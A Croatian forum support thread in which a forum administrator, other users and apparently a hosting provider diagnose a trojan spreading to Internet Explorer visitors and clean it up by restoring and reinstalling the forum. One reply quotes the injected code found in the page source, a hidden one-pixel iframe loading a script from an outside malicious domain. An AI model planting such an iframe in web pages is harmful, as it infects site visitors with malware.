Poslala sam e-mail za pomoć ili savjet kako to riješiti; no ništa od odgovora, a hitno je, tako reći.
Naime, primjetili smo korisnici i ja da već neko vrijeme imamo opad aktivnih korisnika, i nije nam bilo jasno zašto. I jučer saznah od jednog korisnika da mu je prijatelj pokupio virus na našem forumu :eek:

Pošto koristim Mozillu Firefox, nije mi pokazivalo ništa neobično, niti mi se otvarao antivirusni program (kako se otvaralo tim korisnicima, jer koriste IE). Onda sam otišla IE na forum i zaista, otvorio mi se antivirus da prijavljuje trojanca, i otvorilo mi se jedno 50-tak stranice IE-a.

Pošto se osobno ne razumijem previše u viruse, sama ga ne mogu ukloniti. Kopala sam po cpanelu i admin stranicama, no ništa nisam pronašla.

Evo, ovdje je ujedno napisano malo više o tome da znate s čim imam posla, i da sad ne duljim
Pa molim za pomoć.

Hvala Vam unaprijed.

a da probas samo pregazit postojeci forum sa novom instalacijom? naravno pazi na template i provjeri source, ili ako znas u kojem ti se fileu nalazi u sourceu
<iframe src="http://traffsale1.biz/dl/adv748.php" height="1" width="1"></iframe> probaj samo taj file zamijenit sa "zdravim"

Pregaziti postojeći forum novom instalacijom? Pa što neću onda izgubiti sve podatke koje imam?
Jer nisam sasvim sigurna da li će mi uplodati backup koji downloadam, a previše smo se svi trudili i radili na njemu da bi samo tako nestao.

A taj file ne mogu pronaći nigdje u cpanelu, nema šanse :eek:

Nećeš izgubiti niti jedan jedini podatak, jer podaci nisu u folderu od foruma već posebno u takozvanoj mysql bazi. ;)

Možda ćeš jedino opet trebati složiti neke postavke u konfiguraciji foruma ako si ih bila mjenjala, ali to možeš tako srediti da ne overwirteaš konfig fajl. No opet možda je u njoj baš skriven virus. Problemi...^^

Danas uopće nisam pametna :D Morat ću ja to malo više proučiti; a nemam previše vremena zbog nekih drugih obaveza. Znači, samo reinstaliram Invision Board? I to je to, ili?

dobili smo tek danas Vaš mail i odmah odgovorili.
Nako što vidimo sve javiti ćemo se na Vaš mail.

pozdrav, SC

definitivno imate problem, trojan se nalzi i radi se o windows trojanu i zato nije detektiran sa naše strane.

Vjerovatno ste skidali neki od template i tada ste si "sami" postavili trojana.

Najsigurnije napraviti EXPORT podataka od foruma, zatim pobrisati folder gdje je forum, napraviti novu instalaciju i importirati stari SQL od foruma.

IMPORT / EXPORT radite kroz administraciju foruma.

pozdrav, SC

dodatak:

možda je i jednostavnije rješenje:

pobrisati direktorij gdje su tempalate i vratiti ORGINAL template i naravno u forumu podesiti da se poziva original template.

No da nešto ne krene po loše najbolje da nam odgovorite na mail koji smo Vam poslali i sve ćemo rješiti za cca 1h.

I svakako je preporuka da ne radite instalacije templatea sa NEPROVJERENIH stranica.

pozdrav, SC

Poslala sam e-mail za pomoć ili savjet kako to riješiti; no ništa od odgovora, a hitno je, tako reći.
Naime, primjetili smo korisnici i ja da već neko vrijeme imamo opad aktivnih korisnika, i nije nam bilo jasno zašto. I jučer saznah od jednog korisnika da mu je prijatelj pokupio virus na našem forumu :eek:

Pošto koristim Mozillu Firefox, nije mi pokazivalo ništa neobično, niti mi se otvarao antivirusni program (kako se otvaralo tim korisnicima, jer koriste IE). Onda sam otišla IE na forum i zaista, otvorio mi se antivirus da prijavljuje trojanca, i otvorilo mi se jedno 50-tak stranice IE-a.

Pošto se osobno ne razumijem previše u viruse, sama ga ne mogu ukloniti. Kopala sam po cpanelu i admin stranicama, no ništa nisam pronašla.

Evo, ovdje je ujedno napisano malo više o tome da znate s čim imam posla, i da sad ne duljim http://eko-forum.com/forum/index.php?showtopic=1109
Pa molim za pomoć.

Hvala Vam unaprijed.

Vratili smo Vas iz BACKUPA jer je prilično toga bilo u "neredu".
Definitivno ste sami nešto postavili na svoj sajt (prijevod, template i sl.)

SADA JE SVE UREDU.

Kao što smo naveli:
Svakako je preporuka da ne radite instalacije templatea sa NEPROVJERENIH stranica

pozdrav, SC

Vaš forum ipak nije uredu.

pozdrav, SC

Nisam apsolutno ništa prčkala po templates, niti sam išta instalirala na forum :confused: Taj virus se samo odjednom pojavio, a ja nemam pojma kako jer nisam ništa dirala, niti je itko drugi dirao... A sad, da li je tko "upao" u sistem, ne znam.
No, eto, ubrzo završavamo sa kopiranjem tekstova koje želimo sačuvati pa ćemo prijeći na SMF forum.

Pa ajd budite kavaliri pa joj to vi napravite i neka bude defaultni jezik i template postavljen, mislim, teško da će si ona sama exportat, importat, reinstalirati...jer nije toliko puno posla koliko se neupućeni lako mogu zeznuti.

Takodjer jel se ne može sa sajta od kud je ponovo skinut taj template ili jezik pa a pregledat antivirusom prije uplaoda?

EDIT: a prelazite na SMF, onda ništa. ^^ Ali postoje mislim konverteri baze podataka tako da bi bili minimalni gubici. Ali opetm problem je što on radi sa specifičnim verzijama foruma, pretpostavljam.

to nije problem, mi moramo samo dobiti zahtjev na mail.
To je naša standardna procedura.

Lokalno treba skinuti template i provjeriti da li je uredu i nakon toga raditi upload na web.

pozdrav, SC

OK je, instalirali smo novi SMF, koji mi se čak više sviđa od InvisionBoarda, no jedino nam je svima žao što smo izgubili toliko postova i truda koji smo uložili u taj prijašnji. No mislim da će na kraju sve ispasti u redu :)

Samo bih još pitala, da li je moguće da se instalira neki antivirusni program (kao i kod maila) koji bi štitio od mogućih takvih nasilnih upada.

Ja se zaista nisam petljala u templates, jedino što sam očistila statistike prošlih mjeseca koje su mi oduzimale megabajtažu nepotrebno.

Samo mi i dalje nije jasno kako je virus mogao samo tako upasti u forum :confused:

nije bio virus tj. radilo se o trojancu. Ono što je napravljeno je to da je postavljen vanjski URL a ne fajla.
Ovo je isključivo do foruma i njegove ne sigurnosti tj. rupa.

pozdrav,SC

Aha!
Super, hvala :)